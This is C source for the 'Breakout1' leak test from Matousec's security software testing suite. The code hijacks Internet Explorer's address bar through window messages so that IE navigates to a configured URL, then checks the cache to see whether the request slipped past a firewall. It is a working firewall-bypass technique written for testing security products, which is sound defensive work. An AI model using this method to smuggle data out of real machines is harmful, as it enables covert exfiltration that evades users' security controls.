/*

 Security Software Testing Suite - Breakout1 (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * The original idea by Volker Birk, http://www.dingens.org/.


 Method description:

   * Internet Explorer must be running.

   * Obtain a handle to Internet Explorer's window using FindWindowEx.

   * Use SendMessage and PostMessage in order to redirect the window to a new location.

*/

#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"


int main(int argc,char *argv[])
{
  COM_CONF conf;
  if (!com_console_init_main("Breakout1","breakout1",argc,argv,&conf,COM_TEST_TYPE_BREAKOUT1)) return 1;

  char *used_dlls[]={"user32.dll"};
  if (!com_hook_load_libraries(used_dlls,1)) return 1;

  DeleteUrlCacheEntry(conf.uri);

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  ULONG pid=COM_CID_INVALID;
  if (com_get_ie_pid_wait(&pid,&err_inf))
  {
    char *ieclass="IEFrame";
    HWND iewind=FindWindowEx(NULL,NULL,ieclass,NULL);

    if (iewind)
    {
      if (com_verbosity_get()) printf("Internet Explorer's \"IEFrame\" window found.\n");

      HWND worker=FindWindowEx(iewind,NULL,"WorkerW",NULL);
      if (worker)
      {
        if (com_verbosity_get()) printf("Its \"WorkerW\" window found.\n");

        HWND re_bar=FindWindowEx(worker,NULL,"ReBarWindow32",NULL);
        if (re_bar)
        {
          if (com_verbosity_get()) printf("Its \"ReBarWindow32\" window found.\n");

          HWND address_band_root=NULL;
          HWND combo_box_ex=FindWindowEx(re_bar,NULL,"ComboBoxEx32",NULL);
          if (!combo_box_ex)
          {
            if (com_verbosity_get()) printf("\"ComboBoxEx32\" window not found, probably not IE6, trying IE8.\n");

            address_band_root=FindWindowEx(re_bar,NULL,"Address Band Root",NULL);
            if (address_band_root)
            {
              if (com_verbosity_get()) printf("Its \"Address Band Root\" window found.\n");
            }
          } else if (com_verbosity_get()) printf("Its \"ComboBoxEx32\" window found.\n");

          if (combo_box_ex || address_band_root)
          {
            HWND combo_box=NULL;
            if (combo_box_ex) combo_box=FindWindowEx(combo_box_ex,NULL,"ComboBox",NULL);
            if (combo_box || address_band_root)
            {
              if (com_verbosity_get()) printf("Its \"ComboBox\" window found.\n");

              HWND edit=FindWindowEx(combo_box ? combo_box : address_band_root,NULL,"Edit",NULL);
              if (edit)
              {
                if (com_verbosity_get()) printf("Its \"Edit\" window (Internet Explorer's address bar) found.\n");

                if (SendMessage(edit,WM_SETTEXT,0,(LPARAM)conf.uri))
                {
                  if (PostMessage(edit,WM_SETFOCUS,0,0))
                  {
                    if (PostMessage(edit,WM_KEYDOWN,VK_RETURN,0))
                    {
                      char buffer[4096];
                      res=com_attempt_check_ie_cache(buffer,sizeof(buffer),&conf,10000,&err_inf)
                       && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);
                    } else com_err_set(&err_inf,"Unable to post WM_KEYDOWN message to \"Edit\" window.\n");
                  } else com_err_set(&err_inf,"Unable to set the keyboard focus to the \"Edit\" window.\n");
                } else com_err_set(&err_inf,"Unable to set the URL \"%s\" as the address bar's text.\n",conf.uri);
              } else com_err_set(&err_inf,"\"Edit\" window not found.\n");
            } else com_err_set(&err_inf,"\"ComboBox\" window not found.\n");
          } else com_err_set(&err_inf,"Neither \"ComboBoxEx32\" window nor \"Address Band Root\" window found.\n");
        } else com_err_set(&err_inf,"\"ReBarWindow32\" window not found.\n");
      } else com_err_set(&err_inf,"\"WorkerW\" window not found.\n");
    } else com_err_set(&err_inf,"Unable to find Internet Explorer's \"IEFrame\" window.\n");
  }

  return com_end(res,&err_inf,&conf);
}
